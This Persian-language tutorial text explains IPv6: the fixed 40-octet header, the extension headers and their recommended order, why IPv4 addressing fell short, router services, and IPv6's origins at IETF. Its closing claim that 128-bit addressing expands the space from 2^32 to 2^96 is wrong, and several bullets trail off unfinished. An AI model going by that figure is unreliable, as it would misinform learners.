IPv6 Header : هدر Ipv6 با طول ثابت 40 octet در مقايسه با هدر Ipv4 با طول 20 octet

Extension Header : هدر اضافي با مشخصات زير:



تنظيمات مسير به مسير هدر:مشخص كننده تنظيمات خاصي كه براي پردازشهاي مسير به مسير در عبور از مسيريابها لازم ميباشد.
هدر مسيريابي:فراهم كننده مسيريابي گسترده شبيه مسيريابي مبدا در IPv4
هدر جداسازي:شامل جداسازي و دوباره سازي اطلاعات
هدر شناسايي: فراهم كننده درستي و بي عيبي Packet ها همچنين شناسايي وتصديق آنها
هدر بسته بندي امنيتي: فراهم كننده امنيت
تنظيمات هدر مقصد: شامل اطلاعات انتخابي براي بازرسي يا بررسي ايستگاه مقصد


طبق استاندارد Ipv6 پيشنهاد شده است زماني كه از چندين هدر اضافي استفاده مي كنيد ترتيب زير را در نظر داشته باشيد:



هدر IPv6 : هميشه بايد اول ظاهر شود
تنظيمات مسير به مسير هدر
هدر تنظيمات مقصد: :براي انتخاب(تنظيمات) پردازشهاي انجام شده بوسيله اولين ايستگاه كه در فيلد آدرس مقصد IPv6 ظاهر مي شود به اضافه مقصد هاي بعدي كه در هدر مسيريابي ليست شده اند.
هدر مسيريابي
هدر جداسازي
هدر شناسايي
هدر بسته بندي امنيتي
هدر تنظيمات مقصد: براي انتخاب(تنظيمات) پردازشهاي انجام شده بوسيله مقصد نهايي packetها

نقش يك پروتكل اينترنتي

با تغيير ماهيت اينترنت و شبكه هاي تجاري، IP موجود كه ستون فقرات شبكه هاي TCP/IP را تشكيل مي داد رو به منسوخ شدن و كهنگي مي رفت.در گذشته از اينترنت براي انتقال فايل ها، نامه هاي الكترونيكي و دسترسي از راه دور به وسيله Telnet استفاده مي شد اما امروزه در اينترنت شاهد فزوني برنامه هاي صوتي و تصويري ، نرم افزارهاي كاربردي توانمند هستيم كه باعث جلب محبوبيت و جذابيت وب شده اند. كمپانيها با ايجاد شعبه هاي مختلف مجموعه اي از محيط هاي Client/Server تحت شبكه به وجود آوردند كه باعث افزايش روز افزون اينترانت ها شد، تمام اين توسعه ها باعث كاهش تواناييهاي شبكه هاي بر پايه IP شده و شبكه ها نياز به پشتيباني ترافيك هاي فوري ، كنترل انعطاف پذيري تراكم ترافيك ها و ايجاد خصوصيات امنيتي پيدا كردند، اين توسعه و نيازها موجب به اتمام رسيدن طول عمر آدرس دهي هاي موجود طبق IPv4 شد.

خيلي زود آدرس دهي جديدي جايگزين آدرس دهي قديم شد كه IPv6 نام گرفت. آدرس دهي Ip باعث ايجاد ارتباط سيستم ها از طريق شبكه هاي مختلف مي شود در نتيجه كليه ايستگاه ها و مسيرياب ها به داشتن يك آدرس ملزم مي شوند تا به ايجاد ارتباط بين آن ها منتهي شود.

Router (مسير ياب) بايد قادر باشد اطلاعات شبكه هاي مختلف را با ساختارهاي مختلف انتقال داده و به مقصد مورد نظر بفرستد، اين امر مستلزم فراهم آوردن سرويس هاي زير مي باشد:

· نماي آدرس دهي : همه شبكه ها از يك ساختار هماهنگ براي آدرس دهي استفاده نمي كنند به عنوان مثال يك شبكه IEEE 802.3 با 16bit or 48bit فضاي آدرس دهي ، يك شبكه X.25 با 12 Digit decimal آدرس دهي و...

· بزرگترين اندازه بسته هاي اطلاعاتي : بسته های اطلاعاتی يک شبکه ممکن است به قسمتهای کوچک تر تقسيم شده تا قابل انتقال به شبکه های ديگر باشد « به اين عمل fragmentation مي گويند» به عنوان مثال بزرگترين اندازه بسته های اطلاعاتي برای شبکه های Ethernet 1500بايت می باشد برای شبکه های X.25 1000 است در اين صورت مسيرياب بايد برای انتقال اطلاعات از شبکه های Ethernet به شبکه های X.25 بسته های اطلاعات را به 2 قسمت تقسيم کند.

· رابط هاي شبكه Interfaces)) :ارتباط دهنده های سخت افزاری و نرم افزاری در شبکه های مختلف متفاوت می باشد که مسيرياب بايد قدرت تشخيص اين اختلافات را داشته باشد.

· قابليت اطمينان : سرويسهاي مختلف يك شبكه ممكن است از ابتدا تا انتها به صورت يك سرويس قابل اعتماد در يك حلقه مجازي تا يك سرويس غير قابل اعتماد قابل تغيير باشند. عملكرد يك مسرياب نبايد وابسته به قابليت اعتماد يك شبكه باشد.

در نتيجه اين IP مطمئن نيست چون درستي رسيدن اطلاعات را تضمين نمی کند و مسووليت سالم رسيدن بسته های اطلاعاتي را به پروتکل لايه بالايي (TCP) می سپارد به اين شکل Error recovery توسط TCP صورت می پذيرد اين امر تا حد زيادی قابليـت انعطاف پذيری را فراهم می آورد.



ايجاد يك پروتكل جديد:

وقتي اينترنت روزبه روز رشد کرد و نقايص IPv4 بيشتر آشکار شد برای پاسخ به نيازهای جديد می بايست راهی انديشيده می شد درنتيجه اين درخواست ها IETF ..... در سال 1992 اولين طرح خود را به عنوان IP جديد ارائه داد که پس از طراحی نهايي در سال 1994 بيرون آمد که بعد از آن تغييراتی روی آن داده شد و بالاخره IPv6 نام گرفت. پيشبرد IPv6 بيشتر به خاطر نداشتن محدوديـت های آدرس دهی در IPv4 می باشد که البته اين IP جديد علاوه بر آن قابليت های ديگری هم دارد که به شرح آنها خواهيم پرداخت.

آدرس دهي

با 32 بيت فضای آدرس دهی تنها 2 به توان 32 آدرس مختلف می توان ايجاد کرد که حدود 4 ميليارد آدرس است اين فضای آدرس دهی در اينترنت روبه رشد فضای محدودی است از سال 1980 به بعد دريافتن که ديگر اين مقدار فضا جواب گوی نيازها نيست و در سال 1990 اين مشکل به طور آشکار نمايان شد. دلايل نامناسبی 32 بيـت فضای آدرس دهی به شرح زير می باشد:



· دوساختار از IP Address شامل Net ID و Host ID که راحت و مناسب است اما با فضای آدرس دهی محدود. يك مرتبه كه به شبكه خود تعدادي از آدرسها را اختصاص مي دهيد براي همه شبكه هاي ميزبان نيز مي توانيد از اين آدرسهاي استفاده كنيد. فضاي آدرس دهي براي آن شبكه ممكن است به صورت گسترده اي استفاده شود البته بدون اينكه شما نگران از دست دادن كارايي آن باشيد.

· اين يك تمرين عمومي براي اختصاص دادن تعدادي از آدرس هاي IP به شبكه هايي مي باشد كه به صورت واقعي به اينترنت متصل مي باشند. اين موضوع براي شبكه هاي مخفي اينترنتي كه تعدادي از اين آدرسها را استفاده مي كنند ، امكان پذير مي باشد. اما براي استفاده از آنها كمي ريسك وجود دارد.

· شبکه ها به سرعت رو به افزايش هستند. اغلب سازمان ها چندين Lan دارند. شبکه های بی سيم به تدريج نقش اساسي يافته اند همچنين رشد اينترنت درسالهای آتي رو به انفجار است.

· افزايش استفاده از TCP/Ip در مناطق جديد خواستار IP های خاص (unique ip address) می باشد. مثل ارتباط نقاط الکترونيکی يا کابل تلوزيون گيرنده ها.....

· به طور کلي دادن يک IP به هر ايستگاه کاری ....

برای داشتن اين آدرس ها Ipv6 از 128 بيت فضای آدرس دهی در عوض 32 بيت استفاده می کند و اين امر فضای آدرس دهی را از 2 به توان 32 به 2 به توان 96 می رساند که البته امن تر و مطمئن تر نيز می باشد.